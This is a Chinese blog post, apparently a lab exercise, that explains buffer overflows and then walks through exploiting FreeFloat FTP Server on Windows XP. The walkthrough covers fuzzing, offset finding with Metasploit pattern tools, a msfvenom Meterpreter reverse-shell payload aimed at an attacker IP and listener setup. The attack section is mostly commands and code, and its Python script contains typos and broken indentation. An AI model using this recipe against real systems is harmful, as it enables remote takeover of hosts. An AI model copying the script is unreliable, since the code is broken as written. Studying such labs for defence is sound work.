缓冲区溢出攻击(详细解析)

最新推荐文章于 2024-03-22 17:30:00 发布
最新推荐文章于 2024-03-22 17:30:00 发布
阅读量1.9k 收藏 15
点赞数
文章标签: 安全 网络安全 安全威胁分析 网络攻击模型 系统安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_51957047/article/details/130179134
版权

定义:利用缓冲区溢出漏洞进行攻击行动

攻击原理

通过往程序的缓冲区写超出其长度的内容,造成缓冲区的溢出,从而破坏程序的堆栈,使程序转而执行其它指令,以达到攻击的目的。造成缓冲区溢出的原因是程序中没有仔细检查用户输入的参数。

防范方法

缓冲区溢出攻击占了远程网络攻击的绝大多数,这种攻击可以使得一个匿名的Internet用户有机会获得一台主机的部分或全部的控制权。如果能有效地消除缓冲区溢出的漏洞,则很大一部分的安全威胁可以得到缓解。
有四种基本的方法保护缓冲区免受缓冲区溢出的攻击和影响。
1.通过操作系统使得缓冲区不可执行,从而阻止攻击者植入攻击代码。
2.强制写正确的代码的方法。
3.利用编译器的边界检查来实现缓冲区的保护。这个方法使得缓冲区溢出不可能出现,从而完全消除了缓冲区溢出的威胁,但是相对而言代价比较大。
4.一种间接的方法,这个方法在程序指针失效前进行完整性检查。虽然这种方法不能使得所有的缓冲区溢出失效,但它能阻止绝大多数的缓冲区溢出攻击。分析这种保护方法的兼容性和性能优势。

环境模拟

攻击机:kali2021
靶机版本:windows XP 英文版

本环境自己搭建,部分工具自己下载

缓冲区溢出攻击脚本

import socket
import optparse

def ftpfuzz(host,post):
    st = ()
    conn = socket.socket(sockrt.AF_INET, socket.SOCK_STREAM)
    try:
            conn.connect((host,port))
            print '[+] Connected'

    except:
            print '[-] Connection failed!'
            exit(0)

    
    res = conn.recv(1024)
    print str(res)
    print '[+] Sendinf buffer...'
    conn.send('USER ' + st + '\r\n')


def main():
    parser = optparse.OptionParser('usage%prog '+'-H <target host> -P <target port>')
    parser.add_option('-H', dest='tgtHost', type='string', help='specify target host')
    parser.add_option('-P', dest='tgtPort', type='int', help='specify target port')
    (option, args) = parser.parse_args()
    host = options.tgtHost
    port = options.tgtPort
    if (host == None) | (port == None):
print parser.usage
            exit(0)
    ftpfuzz(host,port)

if __name__ == '__main__':
    main()

2./usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l 300 生成300字节的字符串

在这里插入图片描述

3.将生成的300字符串放进脚本中,st=()

在这里插入图片描述
4.在windowsxp中,开启靶机环境

C:\Tool\OllyICE\OllyICE.exe
在这里插入图片描述

C:\freefloatftpserver1.0\Win32\FTPserver.exe

在这里插入图片描述
在这里插入图片描述

启动ftp

在这里插入图片描述

5.运行脚本,进行溢出

python ftp_fuzz_test.py -H 172.16.101.10 -P 21

在这里插入图片描述

靶机显示内存地址在37684136溢出

在这里插入图片描述

/usr/share/metasploit-framework/tools/exploit/pattern_offset.rb -q
0x37684136

发现在230字符串溢出
在这里插入图片描述

7.生成shellcod上传脚本,进行payload监听

msfvenom -p windows/meterpreter/reverse_tcp LHOST=172.16.101.7
LPORT=5551 -f python -v shellcode -b “\x00\x0a\x0d”

在这里插入图片描述

在windowsxp中,打开cmd,切换Tool目录下查看可执行模块的内存地址

在这里插入图片描述

在这里插入图片描述

findjmp.exe USER32/dll

在这里插入图片描述

脚本添加

st = (“A”*230 + “\x53\x93\xD2\x77” + “\x90” * 32+shellcode)

在这里插入图片描述

打开msfconsole进行监听

use exploit\multi\handler
set payload windows/meterpreter/reverse_tcp
set LHOST 172.16.101.7
set LPORT 5551

在这里插入图片描述

Python ftp_fuzz_test.py -H 172.16.101.10 -P 21

运行脚本,进行会连

在这里插入图片描述
在这里插入图片描述

Eglike
关注
  • 0
    点赞
  • 15
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
网络安全期末复习题及答案解析.doc
06-09
网络安全期末复习题及答案 一、选择题: 1. 计算机网络安全的目标不包括( A ) A.可移植性 B.保密性 C.可控性 D.可用性 2. SNMP的中文含义为( B ) A.公用管理信息协议 B.简单网络管理协议 C.分布式安全管理协议 D.简单邮件传输协议 3. 端口扫描技术( D ) A.只能作为攻击工具 B.只能作为防御工具 C.只能作为检查系统漏洞的工具 D.既可以作为攻击工具,也可以作为防御工具 4. 在以下人为的恶意攻击行为中,属于主动攻击的是( A ) A、身份假冒 B、数据解密 C、数据流分析 D、非法访问 5. 黑客利用IP地址进行攻击的方法有:( A ) A. IP欺骗 B. 解密 C. 窃取口令 D. 发送病毒 6. 使网络服务器中充斥着大量要求回复的信息,消耗带宽,导致网络或系统停止正常服务 ,这属于什么攻击类型? ( A ) A、拒绝服务 B、文件共享 C、BIND漏洞 D、远程过程调用 7. 向有限的空间输入超长的字符串是哪一种攻击手段?( A ) A、缓冲区溢出 B、网络监听 C、拒绝服务 D、IP欺骗 8. 用户收到了一封可疑的电子邮件,要求用户提供银行账户及密码,这是属于何种攻击手段 ( B ) A、缓存溢出攻击 B、钓鱼攻击 C、暗门攻击 D、DDOS攻击 9. Windows NT 和Windows 2000系统能设置为在几次无效登录后锁定帐号,这可以防止:( B ) A、木马 B、暴力攻击 C、IP欺骗 D、缓存溢出攻击 10. 当你感觉到你的Win2003运行速度明显减慢,当你打开任务管理器后发现CPU的使用率 达到了百分之百,你最有可能认为你受到了哪一种攻击。( B ) A、特洛伊木马 B、拒绝服务 C、欺骗 D、中间人攻击 11. 假如你向一台远程主机发送特定的数据包,却不想远程主机响应你的数据包。这时你 使用哪一种类型的进攻手段?( B ) A、缓冲区溢出 B、地址欺骗 C、拒绝服务 D、暴力攻击 12. 小李在使用super scan对目标网络进行扫描时发现,某一个主机开放了25和110端口,此主机最有可能 是什么?( B ) A、文件服务器 B、邮件服务器 C、WEB服务器 D、DNS服务器 13. 你想发现到达目标网络需要经过哪些路由器,你应该使用什么命令?( C ) A、ping B、nslookup C、tracert D、ipconfig 14. 黑客要想控制某些用户,需要把木马程序安装到用户的机器中,实际上安装的是( B ) A. 木马的控制端程序 B. 木马的服务器端程序 C. 不用安装 D. 控制端、服务端程序都必需安装 15. 为了保证口令的安全,哪项做法是不正确的( C ) A 用户口令长度不少于6个字符 B 口令字符最好是数字、字母和其他字符的混合 C 口令显示在显示屏上 D 对用户口令进行加密 16. 以下说法正确的是( B ) A.木马不像病毒那样有破坏性 B.木马不像病毒那样能够自我复制 C.木马不像病毒那样是独立运行的程序 D.木马与病毒都是独立运行的程序 17. 端口扫描的原理是向目标主机的________端口发送探测数据包,并记录目标主机的响 应。( C ) A.FTP B.UDP C.TCP/IP D.WWW 18. 假冒网络管理员,骗取用户信任,然后获取密码口令信息的攻击方式被称为( B )。 A. 密码猜解攻击 B. 社会工程攻击 C. 缓冲区溢出攻击 D. 网络监听攻击 19. 在进行微软数据库(Microsoft SQL Database)口令猜测的时候,我们一般会猜测拥有数据库最高权限登录用户的密码口 令,这个用户的名称是( C )? A. admin B. administrator C. sa D. root 20. 下列哪一种网络欺骗技术是实施交换式(基于交换机的网络环境)嗅探攻击的前提( C )? A. IP欺骗 B. DNS欺骗 C. ARP欺骗 D. 路由欺骗 21. 下列哪一种扫描技术属于半开放(半连接)扫描( B )? A. TCP Connect扫描 B. TCP SYN扫描 C. TCP FIN扫描 D. TCP ACK扫描 22. 恶意大量消耗网络带宽属于拒绝服务攻击中的哪一种类型( C )? A. 配置修改 B. 基于系统缺陷型 C. 资源消耗型 D. 物理实体破坏型 23. 现今,网络攻击与病毒、蠕虫程序越来越有结合的趋势,病毒、蠕虫的复制传播特点 使得攻击程序如虎添翼,这体现了网络攻击的下列哪种发展趋势( C )? A. 网络攻击人群的大众化 B. 网络攻击的野蛮化 C. 网络攻击的智能化 D. 网络攻击的协同化 24. 网络监听(嗅探)的这种攻击形式破坏了下列哪一项内容( B )? A. 网络信息的抗
实验8 缓冲区溢出攻击实验
热门推荐
leapme的专栏
03-17 1万+
实验8 缓冲区溢出攻击实验缓冲区溢出是目前最常见的一种安全问题,操作系统以及应用程序大都存在缓冲区溢出漏洞。缓冲区是一段连续内存空间,具有固定的长度。缓冲区溢出是由编程错误引起的,当程序向缓冲区内写入的数据超过了缓冲区的容量,就发生了缓冲区溢出,缓冲区之外的内存单元被程序“非法”修改。一般情况下,缓冲区溢出导致应用程序的错误或者运行中止,但是,攻击者利用程序中的漏洞,精心设计出一段入侵程序
黑客中级技术--缓冲区溢出攻击(转)
congjukun0600的博客
09-02 503
黑客中级技术--缓冲区溢出攻击(转)[@more@]  缓冲区溢出是一种非常普遍、非常危险的漏洞,在各种操作系统、应用软件中广泛存在。利用缓冲区溢出攻击,可以导致程序运行失败、系统当机、重新启动等后果。更为严重的是,可以利用它执...
网络安全威胁——缓冲区溢出攻击
最新发布
Python栈
03-22 929
(1)缓冲区缓冲区是一块连续的计算机内存区域,用于在将数据从一个位置移到另一位置时临时存储数据。这些缓冲区通常位于 RAM 内存中,可保存相同数据类型的多个实例,如字符数组。计算机经常使用缓冲区来帮助提高性能,大多数现代硬盘驱动器都利用缓冲优势来有效地访问数据,并且许多在线服务也使用缓冲区。例如,在线视频传送服务经常使用缓冲区以防止中断。流式传输视频时,视频播放器一次下载并存储 20% 的视频到缓冲区,然后从该缓冲区进行流式传输,当连接速度的小幅下降或快速的服务中断都不会影响视频流性能。
http解析器:用于c的http requestresponse解析
02-03
HTTP解析器 http-parser。 新项目和希望迁移的项目应考虑 。 这是用C编写的HTTP消息的解析器。它解析请求和响应。 该解析器旨在用于性能HTTP应用程序。 它不进行任何系统调用或分配,不缓冲数据,可以随时中断。 根据您的体系结构,每个消息流(在每个连接的Web服务器中)仅需要大约40字节的数据。 特征: 没有依赖关系 处理持久流(保持活动状态)。 解码分块编码。 升级支持 防御缓冲区溢出攻击解析器从HTTP消息中提取以下信息: 标头字段和值 内容长度 申请方法 响应状态码 传输编码 HTTP版本 要求网址 邮件正文 用法 每个TCP连接使用一个http_parser对象。 使用http_parser_init()初始化结构并设置回调。 对于请求解析器,可能看起来像这样: http_parser_settings settings; settings.on_url = my_url_callback; settings.on_header_field = my_header_field_callback; /* ... */ http_parser *
c语言内存泄露示例解析
12-31
正确的内存管理的重要性存在内存错误的 C 和 C++ 程序会导致各种问题。如果它们泄漏内存,则运行速度会逐渐变慢,并最终停止运行;如果覆盖内存,则会变得非常脆弱,很容易受到恶意用户的攻击。从 1988 年著名的莫里斯蠕虫 攻击到有关 Flash Player 和其他关键的零售级程序的最新安全警报都与缓冲区溢出有关:“大多数计算机安全漏洞都是缓冲区溢出”,Rodney Bates 在 2004 年写道。 在可以使用 C 或 C++ 的地方,也广泛支持使用其他许多通用语言(如 Java:trade_mark:、Ruby、Haskell、C#、Perl、Smalltalk 等),每种语言都有众多的爱好者和各自的优点。但是
网络安全——缓冲区溢出攻击
VN520的博客
04-21 5339
什么是缓冲区?它是指程序运行期间,在内存中分配的一个连续的区域,用于保存包括字符数组在内的各种数据类型。所谓溢出,其实就是所填充的数据超出了原有的缓冲区边界,并非法占据了另一段内存区域。两者结合进来,所谓缓冲区溢出,就是由于填充数据越界而导致原有流程的改变,黑客借此精心构造填充数据,让程序转而执行特殊的代码,最终获取控制权。
网络攻防之缓冲区溢出攻击
IT教育任姐姐的博客
06-07 4688
缓冲区溢出是一种异常现象,当软件向缓冲区中写入数据使缓冲区容量溢出时,会导致相邻存储器位置被覆盖。换句话说,过量的信息被传递到没有足够空间的容器中,而这些信息最终会替换相邻容器中的数据。攻击者可以利用缓冲区溢出修改计算机的内存,以破坏或控制程序的执行。缓冲区或数据缓冲区是一个物理内存存储区,用于在将数据从一个位置移到另一位置时临时存储数据。这些缓冲区通常位于 RAM 内存中。计算机经常使用缓冲区来帮助提高性能。大多数现代硬盘驱动器都利用缓冲的优势来有效地访问数据,并且许多在线服务也使用缓冲区。例如,在线视频
网络安全缓冲区溢出攻击
A1_3_9_7的博客
01-03 1011
(1)缓冲区缓冲区是一块连续的计算机内存区域,用于在将数据从一个位置移到另一位置时临时存储数据。这些缓冲区通常位于 RAM 内存中,可保存相同数据类型的多个实例,如字符数组。计算机经常使用缓冲区来帮助提高性能,大多数现代硬盘驱动器都利用缓冲优势来有效地访问数据,并且许多在线服务也使用缓冲区。例如,在线视频传送服务经常使用缓冲区以防止中断。流式传输视频时,视频播放器一次下载并存储 20% 的视频到缓冲区,然后从该缓冲区进行流式传输,当连接速度的小幅下降或快速的服务中断都不会影响视频流性能。
游戏安全03:缓冲区溢出攻击简单解释
谢白羽
07-31 4295
借助汇编解释和代码举例
HTTP解析器HTTPParser.zip
07-16
防止缓冲区溢出攻击 可以从HTTP消息中解析出下列信息: 报头域及值 Content-Length 请求方法 响应代码 传输编码 HTTP版本 请求URL 消息体 ...
HTTPParser一个用于Swift 3.0的HTTP(RFC 2616)解析器。-Swift开发
05-27
功能异步解析处理持久流(保持活动状态)解码分块编码防御缓冲区溢出攻击HTTPParser封装了node.js使用的C库http_parser。 用法解析器异步工作,因此您应继续提供数据,直到返回请求/响应为止。 let解析器= Request...
什么是缓冲区溢出?深入解析:缓冲区溢出
大大怪的博客
08-28 3809
在计算机安全领域,缓冲区溢出是一种常见的安全漏洞,也被称为缓冲区溢出攻击。它是指当程序尝试向缓冲区写入数据时,超过了缓冲区的容量,导致数据溢出到相邻的内存区域。这种情况可能会导致程序崩溃、数据损坏,甚至允许攻击者执行恶意代码。
软考中级信息安全工程师:网络攻击原理与常用方法之缓冲区溢出攻击
weixin_46239998的博客
08-04 385
网络攻击是指恶意分子通过利用计算机网络中的漏洞和弱点,侵入系统或者获取未授权的访问权限,从而造成数据泄露、服务拒绝、系统崩溃等危害。缓冲区溢出攻击网络攻击中最常见和危险的一种攻击方式之一。它利用程序中的缓冲区漏洞,向缓冲区写入超出其预设大小的数据,导致程序行为异常,甚至获得系统控制权。 缓冲区溢出攻击原理 缓冲区溢出攻击利用程序在处理数据时没有足够的校验或边界检查,从而使得攻击者可以向程序的缓冲区写入比其容量更大的数据。攻击者通常通过发送大量数据,超出了程序预设的缓冲区大小,多余的数据会溢出到相邻内存
网络攻防实验之缓冲区溢出攻击
hxxjxw的博客
07-09 6461
这个实验是网络攻防课程实验中的一个,但是目前我还没有完全搞懂代码,以后有机会来补。也欢迎大佬指点 一、实验目的和要求 通过实验掌握缓冲区溢出的原理,通过使用缓冲区溢出攻击软件模拟入侵远程主机理解缓冲区溢出危害性,并理解防范和避免缓冲区溢出攻击的措施。 二、实验原理和实验环境 实验原理: 缓冲区溢出(Buffer Overflow)是目前非常普遍而且危...
网络安全威胁,如何解决缓冲区溢出攻击
杨荧的CSDN博客
02-15 2015
缓冲区溢出(Buffer Overflow)是指当向缓冲区写入的数据超出缓冲区所能容纳的范围时,多余的数据会覆盖到相邻的内存区域,导致程序行为异常,甚至可能被恶意利用成为安全漏洞。缓冲区溢出是软件开发中常见的安全漏洞之一。
计算机系统基础实验:缓冲区溢出攻击
catting的博客
04-21 7762
通过这次实验,学习到了缓冲区溢出的原理和机制,加深了对函数调用规则的理解,也加深了对栈帧结构的理解。课本上大致描述了栈保护机制,通过模拟缓冲区溢出攻击,了解了栈保护机制,也加深了对课本理论知识的理解。把理论付诸实践,提高了自己的动手能力。通过对这些原理的学习,也提醒我以后在自己编写代码的过程中,要避免写出类似的危险代码,避免不必要的损失。同时,我还学习到了程序运行时操作,了解了这种形式的安全性弱点的性质,以后编写代码时也要多加小心。
Microsoft SQL Server信息泄露及缓冲区溢出漏洞(MS08-040)(CVE-2008-0106)
06-13
MS08-040是针对Microsoft SQL Server的一个安全公告,其中包括两个漏洞:信息泄露漏洞和缓冲区溢出漏洞。这些漏洞可能会允许攻击者远程执行任意代码或者导致拒绝服务攻击。 信息泄漏漏洞(CVE-2008-0106)位于Microsoft SQL Server的解析器中,攻击者可以通过发送包含特殊构造的SQL查询语句来利用该漏洞,从而读取任意文件中的敏感信息。 缓冲区溢出漏洞(CVE-2008-0107)位于Microsoft SQL Server的解析器中,攻击者可以通过发送特殊构造的SQL查询语句来利用该漏洞,从而在受害者计算机上执行任意代码。 微软已经发布了相应的安全补丁来修复这些漏洞,建议用户及时更新补丁以确保系统安全

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Eglike

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值